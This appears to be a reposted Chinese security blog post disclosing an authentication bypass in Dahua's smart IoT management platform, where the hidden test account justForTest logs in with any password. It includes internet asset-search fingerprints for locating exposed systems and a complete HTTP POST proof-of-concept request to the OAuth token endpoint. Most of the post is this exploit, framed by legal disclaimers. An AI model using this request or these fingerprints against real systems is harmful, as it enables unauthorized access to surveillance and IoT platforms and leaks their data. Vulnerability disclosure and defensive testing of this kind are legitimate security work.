漏洞描述
浙江大华技术股份有限公司智能物联综合管理平台 用户登录接口/evo-apigw/evo-oauth/oauth/token存在漏洞,使用用户justForTest/任意密码即可成功登录平台,造成信息泄露。
资产测绘
第二个指纹,资产会比较全面
icon_hash="-1935899595"body="*客户端会小于800*"
漏洞复现
部分界面如下
POC
POST/evo-apigw/evo-oauth/oauth/tokenHTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36Content-Length: 109Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipConnection: closeusername=justForTest&password=1&grant_type=password&client_id=web_client&client_secret=web_client&public_key=
出现各种token证明漏洞存在
即可通过justForTest 任意密码登录
Nuclei脚本
|
免责声明: 本文章仅做网络安全技术研究使用!严禁用于非法犯罪行为,请严格遵守国家法律法规;利用十二主神公众号所提供的所有信息进行违法犯罪或造成任何后果及损失,均由使用者自身承担负责,与十二主神公众号无任何关系,也不为其负任何责任,请各位自重!公众号发表的一切文章如有侵权烦请私信联系告知,我们会立即删除并对您表达最诚挚的歉意!感谢您的理解! |
原文始发于微信公众号(十二主神):【1day】大华智能物联综合管理平台justForTest用户登录漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论